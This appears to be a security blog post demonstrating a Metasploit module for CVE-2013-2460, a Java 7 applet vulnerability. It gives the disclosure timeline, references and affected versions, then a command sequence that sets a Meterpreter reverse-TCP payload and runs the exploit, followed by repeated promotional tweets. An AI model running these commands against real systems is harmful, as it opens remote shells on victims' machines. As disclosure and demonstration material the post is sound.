Timeline :
Vulnerability discovered and reported to vendor by Adam Gowdiak the 2013-04-22 (Issue 61)
Vulnerability corrected by vendor the 2013-06-18
Metasploit PoC provided the 2013-06-24
PoC provided by Adam Gowdiak the 2013-07-18
PoC provided by :
Adam Gowdiak
Matthias Kaiser
Reference(s) :
CVE-2013-2460
OSVDB-94346
SE-2012-01-ORACLE-12
Oracle Java SE Critical Patch Update Advisory – June 2013
Affected version(s) :
Oracle Java SE 7 Update 21 and before
Tested on Windows XP Pro SP3 with :
Java SE 7 Update 17
Description :
This module abuses the insecure invoke() method of the ProviderSkeleton class that allows to call arbitrary static methods with user supplied arguments. The vulnerability affects Java version 7u21 and earlier.
Commands :
use exploit/multi/browser/java_jre17_provider_skeleton set RHOST 192.168.0.20 set TARGET 1 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.0.20 exploit sysinfo getuid
“@DarkOperator: CVE-2013-2460 Java Applet ProviderSkeleton Vulnerability Metasploit Demo http://t.co/jkAyDnTip6“
RT @virusbtn: #VB2013 speaker @eromang writes about two recent Java vulnerabilities included in Metasploit http://t.co/UqsFZ1fr1k http://t.…
RT @virusbtn: #VB2013 speaker @eromang writes about two recent Java vulnerabilities included in Metasploit http://t.co/UqsFZ1fr1k http://t.…
RT @virusbtn: #VB2013 speaker @eromang writes about two recent Java vulnerabilities included in Metasploit http://t.co/UqsFZ1fr1k http://t.…
RT @virusbtn: #VB2013 speaker @eromang writes about two recent Java vulnerabilities included in Metasploit http://t.co/UqsFZ1fr1k http://t.…
#VB2013 speaker @eromang writes about two recent Java vulnerabilities included in Metasploit http://t.co/UqsFZ1fr1k http://t.co/B4z54Ghz5P
CVE-2013-2460 Java Applet ProviderSkeleton Vulnerability Metasploit Demo: http://t.co/whOWg7WK0t
CVE-2013-2460 Java Applet ProviderSkeleton Vulnerability Metasploit Demo http://t.co/ii3MwaLWJw
CVE-2013-2460 Java Applet ProviderSkeleton Vulnerability Metasploit Demo http://t.co/CY6RodO4D2